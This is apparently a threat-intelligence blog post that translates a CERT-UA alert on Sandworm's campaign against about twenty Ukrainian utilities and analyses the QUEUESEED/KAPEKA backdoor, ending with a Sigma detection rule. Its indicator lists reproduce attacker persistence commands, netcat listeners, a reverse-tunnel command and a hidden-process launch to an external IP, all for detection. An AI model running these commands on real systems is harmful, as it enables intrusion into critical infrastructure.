UAC-0133 (Sandworm) plans for cyber sabotage at almost 20 critical infrastructure facilities in Ukraine

Translation of the latest UA-CERT alert published today & Technical Analysis of QUEUESEED which is the KAPEKA Backdoor used in June 2022 in Ukraine

After a customer asked me yesterday whether I already knew the Kapeka backdoor and whether it could be blocked using the latest Sysmon configuration, I’ve analyzed the backdoor yesterday and wrote SIEM customized detection rules (example for threat hunting see below).

The malware, which we are calling “Kapeka”, is a flexible backdoor with all the necessary functionalities to serve as an early-stage toolkit for its operators, and also to provide long-term access to the victim estate. The malware’s victimology, infrequent sightings, and level of stealth and sophistication indicate APT-level activity. W/Labs

Less than 24 hours later, the Ukrainian CERT published its latest alert about an attempt to disrupt critical infrastructure. Here again the attacker is APT44 and this time it is the backdoor QUEUESEED, which is identical to KAPEKA used in June 2022 in Ukraine (same hash, almost same behavior). Therefore, I decided to translate the current UA-CERT article and enrich it with technical information.

Mandiant describes SIX Phases of APT44 disruptive operations during the 2022 war in Ukraine and now the 7th phase could be potentially the non-kinetic attempt to disrupt again with the same backdoors like KAPEKA from June 2022 which was used with SDELETE. Exact the same hash is now in this article for UAC-0133 the QUEUESEED backdoor with the same technical behavior including the SDELETE.

Mandiants overview of the SIX Phases of APT44 Disruptive Operations During the 2022 War in Ukraine

The hash I’ve analyzed for KAPEKA is taken from research by WithSecure where they link the backdoor to Sandworm and which was published 3 days ago. In this research you find a great overview how the malware works with a deep dive reverse engineering analysis. I highly recommend to read the report, same for Mandiants analysis about APT44.

WithSecure Research Kapeka with a in-depth technical analysis of the backdoor

Some Threat Hunting opportunities for both backdoors

I’ve found the example for KAPEKA/QUEUESEED in AnyRun, Virus Total and some more Sandboxes and tested it additionally. A more technical view in the Dr.WEB vxCube Sandbox shows the process creation and execution of the dropped .wll file that is randomly changing the name while the command stays the same. The same I’ve found out for the batch file that is created to delete the artifact again, means the initial file crdss.exe which seems not to change the name and is an invariant behavior for the backdoor. Like mentioned before the same executable is used by Sandworm since at least June 2022 in the Ukrainian conflict. The self-deletion batch file which is deleting crdss.exe has a different name each time it is created. It is hidden in the AppData or Tmp folder (in my own test).

Example KAPEKA for the batch file

C:\Windows\system32\cmd.exe /c “C:\Users\admin\AppData\qehe.bat”

Example QUEESEED in the UA-CERT article

%COMSPEC% /c %APPDATA%\pizi.bat

The persistence of both backdoors is ensured by a dropper that creates a corresponding scheduled task or entry in the “Run” branch of the Windows registry.

Here are additionally the registry entries for the backdoor for SENS API (KAPEKA example AnyRun):

C:\WINDOWS\system32\cmd.exe” /c REG ADD

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v “Sens Api” /t REG_SZ /d “C:\WINDOWS\system32\rundll32.exe \”C:\Users\admin\AppData\Local\Microsoft\cujuni.wll\”, #1" /f

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v “Sens Api” /t REG_SZ /d “C:\WINDOWS\system32\rundll32.exe \”C:\Users\admin\AppData\Local\Microsoft\cujuni.wll\”, #1" /f

Another example of KAPEKA for T1547 Registry Run Keys /Startup Folder persistence:

C:\Windows\system32\rundll32.exe “C:\Users\admin\AppData\Local\Microsoft\jagyg.wll”, #1

And the latest Ukrainian CERT article scheduled task SENS API for QUEUESEED:

%COMSPEC% /c schtasks /create /sc ONSTART /tn “Sens Api” /f /np /tr %WINDIR%\system32\rundll32.exe %PROGRAMDATA%\Microsoft\lunose.wll, #1

Another artifact in the Ukrainian CERT article for the persistence:

C:\Windows\system32\rundll32.exe “%PROGRAMDATA%\Microsoft\hasuti.wll”, #1

Both have the /c schtasks /create /sc ONSTART /tn “Sens Api” /f /np /tr with and .wll for robust detection. The paths for the persistence and the batch file can differ within the backdoors, but the commands, dropper, self-deletion etc. are the same.

The following content is the translation of the latest UA-CERT article about Sandworm and the latest assumption that the cyberattacks are used as an attempt to disrupt the critical infrastructure while missile strikes on infrastructure facilities in Ukraine enhance the destructive effect.

General Information

In March 2024, the Government Computer Emergency Response Team of Ukraine (CERT-UA) uncovered a malicious plan of the Sandworm group aimed at disrupting the sustainable functioning of information and communication systems (ICS) of about twenty enterprises in the field of energy, water and heat supply (OKI) in ten regions of Ukraine.

In addition to the QUEUESEED backdoor (KNUCKLETOUCH, ICYWELL, wrongsens, kapeka) known since 2022, a new toolkit of attackers was detected, namely, malware LOADGRIP and BIASBOAT (Linux variant of QUEUESEED), which were installed on computers (Linux OS), designed to automate process control processes (APCS) using specialized software of domestic production. It should be noted that BIASBOAT was presented in the form of a file encrypted for a specific server, for which the attackers used the pre-obtained value “machine-id”.

CERT-UA specialists confirmed the facts of compromise of at least three “supply chains”, in connection with which the circumstances of the initial unauthorized access either correlate with the installation of SDRs, which contained software bookmarks and vulnerabilities, or are caused by the regular technical ability of the supplier’s employees to access the ICS of organizations for maintenance and technical support.

Taking into account the functioning of computers with SDRs within the ICS OKI, the attackers used them for horizontal movement and the development of a cyberattack against corporate networks of enterprises. For example, on such computers, a pre-created PHP webshell WEEVELY and a PHP tunnel REGEORG were found in the catalogs with SDRs. NEO or PIVOTNACCI.

In the period from 07.03.2024 to 15.03.2024, CERT-UA specialists took measures to inform all identified enterprises and investigate and counter cyber threats in the relevant ICS, within the framework of which the circumstances of the initial compromise were established, malware was seized and analyzed, a chronology of incident events was built, assistance in setting up server and active network equipment, and protection technology was installed (at some LOADGRIP/BIASBOAT enterprises there was created in 2023).

It should be emphasized that the attackers used QUEUESEED and GOSSIPFLOW malware on Windows computers, which have been monitored since 2022 in the context of destructive cyberattacks by the UAC-0133 group on water supply facilities, in particular, using SDELETE. Thus, with a high level of confidence, UAC-0133 is a subcluster of UAC-0002 (Sandworm/APT44).

It should be noted that the following factors contributed to the implementation of cyberattacks:

• incorrect segmentation (lack of isolation) of servers with SDRs of suppliers used as an element of the process control system, in the context of both restriction of access to/to the Internet and ICS of the organizations within which they operate
• negligent attitude of suppliers to the security of software provided to consumers; in particular, a superficial analysis of the source code will reveal trivial vulnerabilities that allow remote code execution (RCE).

Enhance the effect of missile strikes

CERT-UA assumes that unauthorized access to ICS for a significant number of heat, water and energy supply facilities should have been used to enhance the effect of missile strikes on infrastructure facilities in Ukraine in the spring of 2024.

QUEUESEED is a malicious program developed using the C++ programming language. Receives basic information about the computer (OS, language, user name), executes commands received from the control server and sends the result. Functions: read/write files, execute commands (as a standalone process, or via %COMSPEC%/c), update configuration, self-delete. HTTPS is used to interact with the management server. The data is transmitted in JSON format and encrypted using RSA+AES. The backdoor configuration file, which in particular contains the URL of the management server, is encrypted using AES (the key is statically set in the program). Implemented queue of raw incoming commands/results — stored in the Windows registry in AES-encrypted form (the value %MACHINEGUID is used as the key). The persistence of the backdoor is ensured by a dropper that creates a corresponding scheduled task or entry in the “Run” branch of the Windows registry.

BIASBOAT, a malicious program (ELF) developed using the C programming language, is a Linux variant of QUEUESEED. Starting on the computer is carried out using the LOADGRIP injector.

LOADGRIP is a malicious program (ELF) developed using the C programming language. The payload is usually presented in encrypted form (AES128-CBC), and the key for its decryption is formed on the basis of the constants statically specified in the code and the value of the “machine-id” of the computer.

GOSSIPFLOW is a malicious program developed using the Go programming language. Provides tunneling (uses the Yamux multiplexer library) and performs the functionality of a SOCKS5 proxy.

In addition to the above-mentioned software tools for implementing cyber threats, the group also used, but not exclusively:

• CHISEL
• LIBPROCESSHIDER
• JUICYPOTATONG
• ROTTENPOTATONG

Cyber Threat Indicators

Files:

4d45d7b60c10c66977f1a593aa36cea7 e165c210a6d7366e2c78e5371d02e3345c25fb75393b7d7e9dc9a8fa737e74d4 r.bat

d58153d94e6b9b331ad2b0f0ce51743a 744364ea94245c26aabfdedc4a6fae2e2d188fbe3c851f439b27ed8a9084a9d1 r3.bat

9ddb6f9dca2d946de295d40af0f35948 350ee0a029eae1d4e4c3d9131a1b32071db9a735326022a565685a9f1521ab73 k.bat

6b0b5c00362339fc5a912eae413b7f1f c13270594f873bb188f893f307d1ec94aa21ee4c3b90301e168eec3a21a055ca r1.bat

1938a3545517650824657fd09ce4ee16 602dbcf4008c585582d5e5d5c8ddb1932fdee07a14308e9cbf937904f31df1f7 jp.exe (JUICYPOTATONG)

cf85ceea940ae5f2cc0ee0a9fc23d5c8 ce85f5bcd52c79582a66bc7ef3f11f4ac74e9cc9962551b5912ac6bfa78ea841 msd.exe (dump LSASS)

a048daae363e6cbe9a191d7189733ea4 6ea79c94ed790093341b1a479eb31bdf7368e3c891501aa2ce18acc71b318c96 rp.exe (ROTTENPOTATONG)

691c1fb1a80f1d4c502753d656e72c32 ccb9edfa233328c3351bd3a46fec037aeb27b3a74779c2bbb738e9e108c33e76 fp.exe (creating scheduled tasks for files via COM objects)

50b5582904fe34451f5cb2362e11cb24 bd07fb1e9b4768e7202de6cc454c78c6891270af02085c51fce5539db1386c3f crdss.exe (QUEUESEED dropper)

5294aaf2ff80547172ebb9e0bcb52e0f f30b9f6e913798ca52154c88725ee262a7bf92fe7caac1ae2e5147e457b9b08a lunose.wll (QUEUESEED)

58504fc65456f2d932173446e15b1799 8685a79ff9e0b1b4a6372c6cd1cafcc9c72e12b83f782466f17c350f2d12184a hasuti.wll (QUEUESEED)

12b4ee7b8a55046520dd1e1dd388bf47 4571860df3a7c8f67db93bd038c1847ddda5ef4b0b23e631d814778ab7a5d549 ntuser.exe.exe (GOSSIPFLOW)

fb9e2fc411c17160b97ab5abfcef7c55 8369d112dc42151ceb3aaa6eca96fb66a08e631a2f18860d716a0604a80da76c opf.sh

963ea514ef1b047e99cc90503f16b2c5 4e6582b8ff2fb2e91cc31de2f4ed4f72ef7ac52845d4dbfabf36081d849bba64 opf.sh

b80d7cb828535ec1ef6e27e5d5f2d2cd 5fdb577b5ce71c42032c77cf41b3a4478726dff5a234abd0a26ff0bdd42e4ef9 opf.sh

97608532187c8df1abb17156e4d99ee2 4a4dde90762accb8d61caad9923f1473c6d8ee493c7dc6c482dfd52c9f8fc2f5 zkj.sh

9769f67f2189ac32307600a2387e28f7 3f5044eb9f2ae3f46d6b64d56e3a37248ea21a340d4cbb42ba8a809f7c75824b fcm.sh

09fe0ab36d7c16108456c60eb56a09c7 d3f97c3df60da89fc68c722140b6a6c9cc8bfc27ac3e442b5fdcfdfcdbd34e87 crm.sh

cdacfee7c1122983c9394de44493c542 459c676115ad0e363697fda048e7f38c5fa5bb002e3dcdab98d7c93cb61948b3 vuu.sh

48656739fe14c0d70f11f65f67f86de5 dc31de076eb9b2407bc4e7fa44216f906f0857271d71a2ea2fb6f35c96cd8f35 ktc.sh

6993aa0b81fb20d706c00ecf764ce3f2 5557aea34234deb015d8e6c39ea2945bad6dd4e9dfe5278265c1183aa3942394 nfs.sh

0d2363b184e35c0f005db9b40e2cd76c 2239aa7e5765b810009c73a43d6df5526c4c42c31e45d7ae181642dabe2c4d94 wzo.sh

a39a4125e48ce614b44fea879454a0f8 4e568242667c61a1551d3e5f3e42107c43db5d989647b333325d10840cd2d58e qhv.sh

ed7620864bd720c8cf79e63ec4e679d6 155cd259e21c1dc3b6978f528e9d13a55483336c5d3c12d5b801dca720f443b7 nyc.sh

be43644bdf06e8b740ce31c82f4f8bb2 ff6c150364312afd54d37f891da02542756a8036698a0911ab8e32d4e0dea030 kpv.sh

82f7464ec5921ab94656bd4bff58708f feae0ab35affa24c52650c9da789cf214d4f7c37bdef3e4d0412feb4aaa3b4db opf.sh

715fcd523ffceafb970679099b21c55e 270b478209df6ecdd54b4cd7fcba79d30647f83c98f0668795ece81b39d7c629 psk.sh

5ff34c5296a5b170ba86f5a9c1222fca bdd7b08ab069c71877352e4cf7cf0e1e14b14ccffd3fb827a81ed6fc564ff99b bir.elf (BIASBOAT; decrypted)

4e23243e3e2ce4d234034fe163d4d095 77c7db28deb338378367fd9d50e09cc2ef8d7143a11fd0f03eb1bab96e6411fa eso.elf (BIASBOAT; decrypted)

f05aec3e7ea30b93ea11e3cc8b998ca5 9975cfa490c372012364c110a7f249d5c812b0afd84a38ed71821dc56c15b29f sdo.elf (BIASBOAT; decrypted)

5fad6d88dc503f59adfa767e11985ff1 01208ced0bd6bf8b72bbf09ec47ddb52014f56d31bf764184bb35134be873c62 qqa.elf (BIASBOAT; decrypted)

3bee971f994f21779c3bc7e07f7029be 645821ba80859651cdb8c1c1f8129702a85503c62b0c3ce74f99d50214f67244 jjh.elf (BIASBOAT; decrypted)

0b0f1f38f85827b4753c0cfc95ee9dc9 ea415d89592b55402c1ac66fa934bd31ec17456407ac4adb2e72f9bc6f5061af lpq.elf (BIASBOAT; decrypted)

2574bd88088e3437a183016e59302928 06584cc9f5bc80964b80220064dda52e822e81ad1d0053f4390ca1433c64971b oat.elf (BIASBOAT; decrypted)

31d5165a9d83c3ea370c2cd262fbba6f d5620b21a02934aafb2caeaec0f0472adac185f60fc06ee5e97c60cc5cec25ac rgp (LOADGRIP)

087e6a5bf9bafac4b5c7fcc0ab0201f1 9a76e608afca114f18e2b794e9a557b910f43e575c816019a49876188602c3aa kkd (LOADGRIP)

ea2161085f0c5a7a67ab245513ff5162 63939d3bd170846a95b124c09a4b6399ab1e790d0c2f407141de9265efc51ee9 sxw (LOADGRIP)

3d7c4521233b9d9dd6a150c26b5fcc68 1800fcac02899d6d4d9f5f0b15a57a140abb29d6f4877f133d57b3e60eaf66c3 bir

8ab0e9251fe39a6d9ef36d0548476654 1180d7a61dbf718f092b3f9dc63c32e1d0228b190c8c254563b6332cab9d7c0e eso

938f05807048a4e9b95bd4eee8c7c1a4 c3859810b9842daf129bc887e7b267ae70ba985387b1cea0fc62270c74c3d4a6 qqa

064c252bc5ee2395fb82aa7c0e599d3a 343e50eed373fa970545785eeace049ead8bd24a1062d6fcf589a629323532ca jjh

fbe469cbe4c1a746619b0fad3c3647e7 d8cd22fc4ef77c1b19d189dcb1ced5db6ead68867c51a23deed3cb422ca4412a sdo

bdb21d4397f8e76923d6635504a5ada4 a29944006225bb5cb0dacf597ef614cf947a8ac088cec90c954506b38ebdc28e lpq

227b6198541178db566714c503dab36e 8a7b3a7a9a4e8b7fd45c94b56ac59f6e15b6560f692756cf6050342bea06a1b3 oat

dee2d8477084747edf37026dade1a827 fa6439c50f2187da3c4c594f0e53037637184167f3e55a7aa2766e8a3b7d55f0 vjr

7055dce07c716aa2429001dae97633fb d436d509d00d89bf118f2f06bde24bdaaa03e083a514e11fbe000f4c2a81f136 ajh

3e9022ce46fdccab4e40d1e01a8addb4 f3280e61f7c810457b8c6741aa57bdceb1dd918d18f16d314761a49788665877 lws

63ee45adf7d1fe4acd5b1632bbadd873 0d898a405e641797c42a1c39a22740462e3a5ebaa092199005f2b2e505bf5e42 jpt

b53e37e7a414872ec3d33d36c0bc1e81 09fb7feb2b209f79d5ffb855b63037ca8cd8449dd168199a23f15ca9f6a454ea bir

3eeebd90a6ea0d60b10eeac1da2d735c 335d36ba132c292c255c520f09a7eba9ff585d52486f259eff43989658727f4f ijs

d597d341ade717dd73a443172458fc86 52faa381392c1a86b537096c2730de5aeab9be7512bde9536aef84857b19753e meter[.]php (WEEVELY)

d59c63ddb629773aded9c85e472d67e3 a97252c1a675d3c64dc806181e64f0a0e86914a540476b08cc578d94759ee082 _backup_dataform[.]php (WEEVELY)

c998ac471420f48ec121050068972d47 1dbb018010a79d869f9a3f61907f81e61e15a366efe7302e26d93946754cd311 man[.]php (WEEVELY)

b1c30d0f77386b42cefa8f10d0a98576 7cddf5eabb6e59b9901e6a68996413e3469f8c56b4da92cf24c18862221c3046 preload[.]php (WEEVELY)

38f3f5ccb8906940282d0046583d318e c4285344547b314c431ab6226612b2b14f62beb45c6feb91c8fcfa17d7031d98 jspdf[.]php (WEEVELY)

cd439b12d10428db1d3365ea01361f48 e76f78c5afbd1d1a3fefa7a37d1737f9cb06197f4a6d6dd8f7b74f3978362a9f getformdate[.]php (WEEVELY)

9ca2c77a5c2f8401dfb67dab34b648cf e6e1e231195f666e8807432f3992e7b1830a3a170229d679933042d3cc1246aa getformdate[.]php (WEEVELY)

0f359771ef52bf54b2196ce6f8a2642c 29c21a87bed19457f7f76e5f39c818ad563a2ddb203961bb2295263d8e875044 init[.]php (WEEVELY)

2cfc8ce15a56667074c4b0ca4a11d7f3 6ca881729c4610cb08f0f54fa1ff2ad9a0f56313da8ae5caa3746f8c1cd527b2 settings125[.]report[.]php (REGEORG. NEO)

108dddf7f1bc10fafbdc6f11c26b4c5a 3c5e7c6da03c5f66d71332a34b3a1f57fed05d3de624f05dae50f7b14a4e44b3 water[.]php (REGEORG. NEO)

7f1712c4102e4cfadd1c44d9b29f139d 807bfade291ab71c1bb47ef2c18a52d6db7b7546f28a421edf18ebeae5ad00aa main[.]php (REGEORG. NEO)

e64ec2535335ddd40e2fb53b53e5b5f9 e2551b76534f0646fccbffd01856948b8f440618afd2b17cda6a9ae59e8e28f7 .back_devices_[.]php (REGEORG. NEO)

7cf92e30acd55232a050fe1cf6eaf2be 27fe2d836d02a72e61b437b170f2ea6285579a6d443334d3cc2e27e77aa26b7f report[.]php (REGEORG. NEO)

4a7250531376bf48d06547d46a853d60 21897e25ace1e8b4da317cb3ba866a1e22b5211516454596f577cacb435f1455 skm2[.]php (REGEORG. NEO)

233ceffbb3119df13ceb72f01077c998 622e355f8fe1756447a0cb47d4873a0f8ecb7d46d4705c425a4dc015050ad85b jobs[.]php (PIVOTNACCI)

f8cf05346cba3ccd0cdb28c44e8036a1 d8d3a1c24a12795f0c65509db8b40c26396a51d0dfa258b6fc317e8b2270c5a3 fexport[.]php (PIVOTNACCI)

ed8b9d38fe272f2692b47292e74a0352 cca9accd3c1554703ab11eb9c10b146d9d8a84ea165450003200de1ebbc2ac4c .env (CHISEL)

2c1397f61325d3ab7eee97124ed8dcfa c237f1a3f75b2759f66ec741448bb352e95e186a9a689f87c8641b44a13d878b oscada (CHISEL)

88d7b461ac0c52f95a81090cf0903ebc 61b0246202707414da97911c0447eed70499e02285db9190a5842de748ae0bd1 env.so (LIBPROCESSHIDER)

Hosts:

/etc/init.d/crm.sh

/etc/init.d/[a-z]{3}.sh

/etc/rc.d/init.d/opf.sh

/etc/ld.so.preload

/run/systemd/generator.late/opf.service

/etc/init.d/.depend.startup

/etc/rc.d/init.d/.depend.start

/usr/local/etc/rc.d/.depend.start

/tmp/.env

/usr/local/lib/env.so

/usr/sbin/oscada

/var/lib/AccountsService/mex

/var/lib/Pegasus/bir

/var/lib/alternatives/xrr

/var/lib/apache2/ajh

/var/lib/apt/sdo

/var/lib/aspell/akc

/var/lib/certmonger/rgp

/var/lib/dictionaries-common/kkd

/var/lib/dictionaries-common/nzf

/var/lib/initramfs-tools/ijs

/var/lib/dnf/rgp

/var/lib/dpkg/eso

/var/lib/lcw

/var/lib/lws

/var/lib/net-snmp/rgp

/var/lib/nfs/bir

/var/lib/pam/qqa

/var/lib/php/rgp

/var/lib/samba/rgp

/var/lib/sss/xrr

/var/lib/systemd/bir

/var/lib/systemd/jpt

/var/lib/systemd/uoj

/var/lib/ubuntu-advantage/pml

/var/lib/ucf/ero

/var/lib/ucf/lox

/var/lib/ucf/riq

/var/lib/xml-core/jjh

/var/lib/aspell/akc -e /var/lib/dpkg/eso -h

/var/lib/dictionaries-common/kkd -e /var/lib/xml-core/jjh -h

/var/lib/dictionaries-common/lma -e /var/lib/doc-base/oat -h

/var/lib/dictionaries-common/nzf -e /var/lib/apache2/ajh -h

/var/lib/lcw -e /var/lib/lws -h

/var/lib/net-snmp/rgp -e /var/lib/nfs/bir -h

/var/lib/pam/sxw -e /var/lib/dictionaries-common/vjr -h

/var/lib/php/rgp -e /var/lib/Pegasus/bir -h

/var/lib/sss/xrr -e /var/lib/systemd/jpt -h

/var/lib/systemd/uoj -e /var/lib/initramfs-tools/ijs -h

/var/lib/ubuntu-advantage/pml -e /var/lib/pam/qqa -h

/var/lib/ucf/ero -e /var/lib/apt/lpq -h

/var/lib/ucf/lox -e /var/lib/apt/sdo -h

/var/lib/dls/706f64686a6a7669 (example path for configuration file)

/var/lib/[a-z]{3}/[a-f0–9]{16}

/var/www/dokuwiki/inc/preload.php

/var/www/dokuwiki/main.php

/var/www/html/.back_devices_.php

/var/www/html/Scripts/export/jspdf/jspdf.php

/var/www/html/Users/Shared/Presets/_backup_dataform.php

/var/www/html/getformdate.php

/var/www/html/glpi/man.php

/var/www/html/glpi/pics/water.php

/var/www/html/meter.php

/var/www/html/report.php

/var/www/html/settings125.report.php

/var/www/main/.users.php

/var/www/main/Scripts/export/fexport.php

/var/www/main/getformdate.php

/var/www/modules/init.php

/var/www/modules/jobs.php

/var/www/veryimage.php

/var/tmp/sam.txt

/var/tmp/system.txt

Backdoor

%PROGRAMDATA%\Microsoft\hasuti.wll

%PROGRAMDATA%\fp.exe

%PROGRAMDATA%\jp.exe

%PROGRAMDATA%\k.bat

%PROGRAMDATA%\msd.exe

%PROGRAMDATA%\ntuser.exe.exe

%PROGRAMDATA%\r.bat

%PROGRAMDATA%\r1.bat

%PROGRAMDATA%\r2.bat

%PROGRAMDATA%\r3.bat

%PROGRAMDATA%\rp.exe

%PROGRAMDATA%\rs.exe

%PROGRAMDATA%\winbox64.exe

%PROGRAMDATA%a\ibmsmart.exe

%PROGRAMDATA%a\msrsts.doc

%PROGRAMDATA%a\ntuser.exe

QUEUESEED (KAPEKA)

C:\Windows\System32\Tasks\Microsoft\Windows\Sens Api

C:\Windows\System32\Tasks\Microsoft\Windows\OneDrive

C:\Windows\system32\rundll32.exe “%PROGRAMDATA%\Microsoft\hasuti.wll”, #1

%PROGRAMDATA%\Microsoft\lunose.wll

%COMSPEC% /c %APPDATA%\pizi.bat

%COMSPEC% /c schtasks /create /sc ONSTART /tn “Sens Api” /f /np /tr %WINDIR%\system32\rundll32.exe %PROGRAMDATA%\Microsoft\lunose.wll, #1

D:\xampp\htdocs\msd.bat

D:\xampp\htdocs\postgis.php

D:\xampp\htdocs\r.exe

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Sens Api

Global\BFE_Notify_Event_%PROFILEGUID%

HKCU\Software\Microsoft\Cryptography\Providers\%PROFILEGUID%\’Seed’

Start-Process -WindowStyle hidden “%PROGRAMDATA%a\ibmsmart.exe -c 185[.]153[.]199[.]43:50443

Execution of the dropper for the backdoor persistence:

cmd /c start “” C:\Windows\system32\rundll32.exe “%PROGRAMDATA%\Microsoft\hasuti.wll”, #1

Listener

nc -lnvp 7632

nc -lnvp 7633

Oscada Server with port 56743 and Taskkill

oscada server -p 56743 — reverse &

taskkill /F /IM rp.exe

Network:

185[.]38[.]150[.]8

165[.]231[.]34[.]106

178[.]250[.]188[.]114

185[.]225[.]114[.]90

193[.]189[.]100[.]203

194[.]61[.]121[.]211

195[.]154[.]182[.]165

196[.]245[.]156[.]154

196[.]245[.]156[.]34

88[.]80[.]145[.]239

91[.]92[.]137[.]6

5[.]45[.]75[.]45

5[.]45[.]74[.]11

195[.]154[.]166[.]87

185[.]153[.]199[.]43

91[.]92[.]137[.]164

hxxps://185[.]38[.]150[.]8:443/star/key

hxxp://178[.]250[.]88[.]114/ubuntu/focal

hxxp://185[.]225[.]114[.]90/accept

hxxp://194[.]61[.]121[.]211/application

hxxp://195[.]154[.]182[.]165/checkhealth

hxxp://196[.]245[.]156[.]154/map/title

hxxp://91[.]92[.]137[.]164/json

hxxps://165[.]231[.]34[.]106/users/me

hxxps://178[.]250[.]188[.]114/ubuntu/focal

hxxps://185[.]225[.]114[.]90/accept

hxxps://194[.]61[.]121[.]211/application

hxxps://195[.]154[.]182[.]165/checkhealth

hxxps://196[.]245[.]156[.]154/map/title

hxxps://91[.]92[.]137[.]164/json

Graphics

Fig.1 Example of a scheduled task to run QUEUESEED

Fig.2 Example of a BASH script to run LOADGRIP/BIASBOAT

Sigma Rule example for threat hunting or detection for KAPEKA

title: Kapeka Backdoor Scheduled Task
status: experimental
description: Detects the backdoor kapeka with the .wll scheduled task
references:
— https://labs.withsecure.com/publications/kapeka
tags:
— attack.t1053.005
logsource:
#service:
category: process
product: windows
detection:
selection:
ParentImage|endswith:
— ‘\cmd.exe’
Image|endswith:
— ‘\schtasks.exe’
CommandLine|contains:
— ‘/create /sc ONSTART /tn “Sens Api” /f /np /tr “<SYSTEM32>\rundll32.exe \”%ALLUSERSPROFILE%\Microsoft’
— ‘ #1"’
condition: selection
falsepositives:
— none
level: high